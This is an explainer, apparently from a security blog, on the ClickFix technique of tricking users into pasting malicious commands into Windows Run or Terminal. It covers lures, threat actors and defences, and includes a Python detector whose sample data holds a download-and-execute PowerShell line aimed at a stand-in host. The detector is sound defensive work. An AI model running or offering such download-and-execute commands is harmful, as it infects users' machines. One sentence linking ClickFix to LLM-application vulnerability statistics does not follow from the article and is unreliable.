What is ClickFix? The Social Engineering Attack Bypassing Your Defences

ClickFix attacks surged 517% in the first half of 2025, now accounting for 8% of all blocked attacks (ESET, 2025). The volume of news reports we have seen confirms that this social engineering technique has become the second most common attack vector after traditional phishing. Nation-state groups from North Korea, Iran, and Russia have all adopted ClickFix in espionage campaigns, proving its effectiveness against even security-aware targets.

Here is what makes ClickFix dangerous: it bypasses automated security controls by convincing users to infect themselves.

How ClickFix Works

ClickFix tricks users into running malicious commands on their own computers. The attack unfolds in three steps:

Step 1: The fake prompt. You land on a webpage showing what looks like a CAPTCHA ("Verify you are human"), a browser error ("Update required"), or a document problem ("Install plugin to view PDF"). The page looks legitimate. It is not.

Step 2: The keyboard shortcut. The prompt tells you to press Windows+R. This opens the Windows Run dialogue, a built-in system tool. Because it is a legitimate Windows feature, security software does not block it.

Step 3: The payload. You are told to paste (Ctrl+V) and press Enter. What you do not realise is that malicious code was silently copied to your clipboard when you clicked the fake prompt. That single keystroke executes a PowerShell script that downloads malware.

The entire attack takes seconds. The victim bypasses their own security controls without realising it.

macOS users are not immune. The same technique directs them to paste commands into Terminal instead of the Run dialogue.

Why Security Tools Miss It

Traditional security solutions struggle with ClickFix because the malicious payload is not delivered through conventional channels.

Most endpoint detection tools look for malware being downloaded and executed automatically. ClickFix inverts this: the user manually initiates the execution. Email security scans attachments for malicious code, but ClickFix campaigns often contain only a URL or a clean HTML file that redirects to the attack page.

The commands themselves are typically obfuscated PowerShell one-liners that download the actual malware from attacker-controlled infrastructure. By the time the payload arrives, it is running in a user-initiated process that many tools treat as legitimate activity.

This explains why 86% of LLM-integrated applications tested by security researchers were vulnerable to similar user-initiated attack vectors (HouYi Research, 2024). For more on how attackers exploit user trust in AI interfaces, see our breakdown of prompt injection attacks.

Who Uses ClickFix

ClickFix emerged in early 2024 from cybercriminal groups, first observed by Proofpoint in campaigns by the initial access broker TA571 and the ClearFake malware cluster. Within months, it spread across the threat landscape.

Cybercriminal campaigns deliver infostealers like Lumma Stealer, DarkGate, AsyncRAT, and Danabot. The Storm-1865 campaign impersonated Booking.com to target hospitality organisations across North America, Europe, and Asia. Healthcare professionals were targeted through a compromised physical therapy video site (HEP2go) that redirected users to ClickFix prompts.

Nation-state adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

  • Kimsuky (North Korea) targeted think tanks researching North Korean policy, posing as a Japanese diplomat to build trust before delivering ClickFix payloads that installed QuasarRAT
  • MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday to add legitimacy
  • APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
  • UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

When nation-state actors adopt a criminal technique this quickly, it works.

Common ClickFix Lures

Attackers continuously refine their social engineering. Current campaigns use these pretexts:

  • Fake CAPTCHAs displaying "Verify you are human" with instructions to run commands
  • Browser update prompts claiming the page cannot display without an update
  • Document viewer errors requiring a "plugin" to view PDF or Word files
  • Video conferencing issues impersonating Google Meet or Zoom with "fix your audio/video" prompts
  • Device registration claiming the user must register their device to access content
  • Social Security Administration notices about account issues (observed June 2025)

The lures exploit urgency and familiarity. Users have been conditioned to trust "fix" buttons through years of legitimate Microsoft tools. From 2010 to 2015, Microsoft's "Fix it" solutions trained users to click automated repair prompts, and Windows Troubleshooters continue this pattern today. Attackers exploit that learned behaviour: when users see a familiar "fix" button, they follow the instructions without questioning whether the source is legitimate.

The name "ClickFix" itself (coined by Proofpoint researchers in 2024) reflects this pattern. Malicious prompts almost always include a button labelled "Fix", "How to fix", or "Fix it" because attackers know users have been trained to click them.

Defence Strategies

Blocking ClickFix requires both technical controls and user awareness.

Technical controls:

  • Restrict PowerShell execution for non-administrative users through Group Policy
  • Block or monitor WScript.exe and mshta.exe via AppLocker or Windows Defender Application Control
  • Deploy endpoint detection rules for AMSI bypass patterns commonly used by ClickFix payloads
  • Monitor for unusual PowerShell user agents in network traffic

User awareness training:

  • Legitimate CAPTCHA verification never requires running system commands
  • No website needs access to your Run dialogue or Terminal
  • Commands copied from websites should never be pasted into system tools
  • When in doubt, report the prompt to your security team rather than attempting to fix it

Detection opportunities:

  • Alert on Windows+R followed by PowerShell execution within short timeframes
  • Monitor clipboard activity for encoded PowerShell commands
  • Flag HTTP requests with PowerShell user agents to external infrastructure
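One way to turn the detection opportunities above into code, as an added example that is not from the article or from any published rule set: a small Python checker that scores process-creation records for the ClickFix launch pattern (a script host started from the Run dialogue, an encoded or hidden-window PowerShell command, a download cradle, and lure text carried in the command line). The record field names, the sample command lines and the lure comment are constructed for this example, and the indicator patterns are assumptions modelled on publicly reported ClickFix command lines, not a vendor's signatures.

```python
import base64
import re
# Script hosts the article lists for monitoring; anything started from the Run dialogue (Windows+R)
# has explorer.exe as its parent process.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
CRADLE = re.compile(r"invoke-webrequest|\biwr\b|\biex\b|invoke-expression|downloadstring|downloadfile", re.I)
LURE = re.compile(r"not a robot|verify you are human|recaptcha|verification id", re.I)
CHECKS = ((HIDDEN, "hidden window"), (CRADLE, "download cradle"), (LURE, "CAPTCHA lure text in command"))

def encode_ps(script):
    """Build a PowerShell -EncodedCommand value (base64 of UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_event(event):
    """Return the ClickFix indicators matched by one process-creation record (constructed schema)."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if image not in SCRIPT_HOSTS:
        return []
    indicators = []
    if parent == "explorer.exe":
        indicators.append("script host spawned from explorer.exe (Run dialogue)")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        indicators.append("encoded command")
    text = event["cmdline"] + " " + (decoded or "")  # inspect the outer and the decoded layer
    indicators += [label for pattern, label in CHECKS if pattern.search(text)]
    return indicators

def find_clickfix(events, min_indicators=2):
    """Return (event, indicators) pairs that reach the indicator threshold."""
    return [(ev, ind) for ev in events if len(ind := assess_event(ev)) >= min_indicators]

# Constructed sample records (not real telemetry): a ClickFix-style launch carrying the lure
# comment that is appended to the pasted command, and a user simply opening PowerShell via Run.
LURE_PAYLOAD = 'iwr http://lure.example/v.txt | iex # "I am not a robot - reCAPTCHA Verification ID: 7421"'
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmdline": "powershell -w hidden -nop -enc " + encode_ps(LURE_PAYLOAD)},
    {"parent": r"C:\Windows\explorer.exe", "image": PS_PATH, "cmdline": "powershell"},
]
```

The threshold keeps a user who legitimately opens PowerShell from Run (one indicator) below the alert line, while the encoded, hidden, downloading command with lure text trips every check.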

For organisations running ELK or similar SIEM platforms, Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules specifically targeting ClickFix behaviour patterns.

Summary

ClickFix represents a shift in attacker tactics. Rather than fighting endpoint security head-on, attackers now recruit users to bypass their own defences. The technique's effectiveness is proven by its rapid adoption across both cybercriminal groups and nation-state actors within 18 months of first appearing.

The defence is straightforward but requires action: restrict unnecessary system tool access, train users to recognise these lures, and deploy detection rules for the specific execution patterns ClickFix relies on.

For a broader view of how social engineering techniques fit into the current threat landscape, see our AI Security Threats guide.


Last updated: January 2026

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering attack that tricks users into executing malicious commands on their own computers. Attackers use fake CAPTCHA prompts or error messages to convince victims to open the Windows Run dialogue and paste a malicious PowerShell command.

How does a ClickFix attack work?

The attack has three steps: a fake prompt appears claiming the user needs to verify their identity or fix an issue, the user is instructed to press Windows+R to open the Run dialogue, and finally told to paste a command (already copied to their clipboard) and press Enter. This executes malware without triggering typical security alerts.

What malware does ClickFix deliver?

ClickFix campaigns commonly deliver infostealers like Lumma Stealer, DarkGate, and SnakeStealer, as well as remote access trojans including AsyncRAT, QuasarRAT, and NetSupport RAT. The specific payload depends on the threat actor.

Can ClickFix target Mac users?

Yes. Campaigns targeting macOS users have been observed since May 2025, delivering Atomic macOS Stealer (AMOS). These attacks direct users to paste commands into Terminal instead of the Windows Run dialogue.

How do I protect against ClickFix?

Restrict PowerShell and script execution for standard users, deploy endpoint detection rules for ClickFix patterns, and train employees that legitimate verification prompts never require running system commands. If a website asks you to open Run or Terminal, close the page and report it.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) between late 2024 and early 2025, targeting government, defence, and think tank organisations.


References and Sources

  1. ESET. (2025). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks.
  2. Proofpoint. (2025). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by Kimsuky, MuddyWater, APT28, and UNK_RemoteRogue.
  3. Microsoft Security. (2025). Think before you Click(Fix). Technical analysis of ClickFix campaigns including Lampion malware distribution.
  4. Infosecurity Magazine. (2025). ClickFix Attacks Surge 517% in 2025. Summary of ESET H1 2025 findings.
  5. Proofpoint. (2024). ClickFix Social Engineering Technique Floods Threat Landscape. Initial documentation of ClickFix emergence and early campaigns.